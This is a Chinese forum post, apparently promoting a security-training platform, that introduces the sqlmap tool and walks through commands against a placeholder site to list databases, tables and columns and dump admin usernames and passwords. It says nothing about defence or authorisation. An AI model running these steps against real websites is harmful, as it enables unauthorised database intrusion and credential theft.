黑客是如何攻破你的网站的？黑客只需一个小小的软件

嘣儿哥

最先，先简易介绍下sqlmap
简介：
sqlmap是一种开源的工具，可以自动检测和利用SQL注入以及接入该库的服务器。它拥有非常强大的检测引擎、具有多种特性的器、通过库指纹提取访问底层文件系统并通过外带连接执行命令。
支持的数据库：MySQL，Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。
sqlmap支持五种差异的注入模式：
UNION query SQL injection（可联合查询注入Error-based SQL injection（报错型注入）Boolean-based blind SQL injection（布尔型注入）Time-based blind SQL injection（基于时间延迟注入）Stacked queries SQL injection（可多语句查询注入）
基本用法：-u 采用sqlmap--dbs 获取数据库名--tables 获取表名--columns 获取字段名
--dump 获取字段内容
实战：
1.获取库名
python2 sqlmap.py -u "http://xxx.com" --dbs
bspjm4yldsf.jpg (14.51 KB, 下载次数: 0, 售价: 2 酷币)

2020-3-1 01:39 上传

点击文件名下载附件
bspjm4yldsf.jpg
成功获取库名
yphjpo4gcu4.jpg (6.16 KB, 下载次数: 0, 售价: 3 酷币)

2020-3-1 01:39 上传

点击文件名下载附件
yphjpo4gcu4.jpg
接下来得根据经验，猜他的账户，密码 在哪个库里，或是都进去看一下也可以。
2.继续获取表名
python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables
wttrlqqbb3z.jpg (23.78 KB, 下载次数: 0, 售价: 4 酷币)

2020-3-1 01:39 上传

点击文件名下载附件
wttrlqqbb3z.jpg
看见admin 看来离目标 不远了
3.获取字段名
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns
5n3megnrqg5.jpg (19.48 KB, 下载次数: 0, 售价: 3 酷币)

2020-3-1 01:39 上传

点击文件名下载附件
5n3megnrqg5.jpg
看到admin_name admin _pass 果然就在这
4.获取用户名，密码
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump
osmd2owzsrl.jpg (15.05 KB, 下载次数: 0, 售价: 1 酷币)

2020-3-1 01:39 上传

点击文件名下载附件
osmd2owzsrl.jpg
安界网通过开发全球顶尖的网络安全教育精品内容，致力于教育+AI、理论+实战、线上+线下的创新科技教育模式，结合专有师带徒模式贴合应用、实战式教学场景，打造知识课程、社交实战和生态服务为一体的全栈式网络安全教育服务平台；同时研发辅助安全教育平台工具化和产品化的安全服务类型产品；实现为企业提供"一站式"全生命周期的网络安全综合服务提供商。有兴趣的小伙伴可以私信撩我！